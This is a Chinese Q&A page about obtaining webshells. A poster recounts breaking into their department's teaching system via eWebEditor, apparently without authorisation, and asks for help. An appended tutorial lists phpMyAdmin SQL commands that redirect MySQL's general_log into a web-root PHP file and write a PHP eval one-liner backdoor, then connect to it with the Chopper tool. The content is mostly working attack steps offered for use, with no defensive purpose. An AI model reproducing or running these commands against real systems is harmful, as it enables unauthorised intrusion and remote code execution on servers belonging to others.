如何用一句话对ewebeditor拿webshell

Posted 2023-04-19

对session欺骗拿shell的问题讨论的也不知道什么结果，我自己是没成功过在这里想向大家求教下如何用一句话对ewebeditor拿shell。前几天看到系里一个网络教学系统，有ewebeditor，数据库是asp格式的虽然下载下来，而且也得到了密码，后台修改上传格式asa,上传后门，但是，没执行权限。郁闷本想更改路径的，但是，发现怎么改都没用。问下各位怎么才能拿到shell？

参考技术A 预览样式,写入一句话,然后用菜刀连接
如果同样限制脚本执行,那也没办法

通过phpMyAdmin拿webshell

general_log默认为关闭的，root权限开启后，general_log_file会保存所有的查询语句

所以可以开启general_log，然后设置general_log_file为一个php文件，最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like \'general_log\';

general log是关闭状态，执行SQL语句开启general log

set global general_log=on;

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file=\'C:/phpStudy/PHPTutorial/WWW/x.php\';

创建的x.php里的内容

然后执行SQL查询语句

SELECT \'<?php @eval($_POST["x"]);?>\';

执行成功

看一下x.php里的内容

成功插入了一句话木马

用菜刀连接，看看是否能够解析的

 

连接成功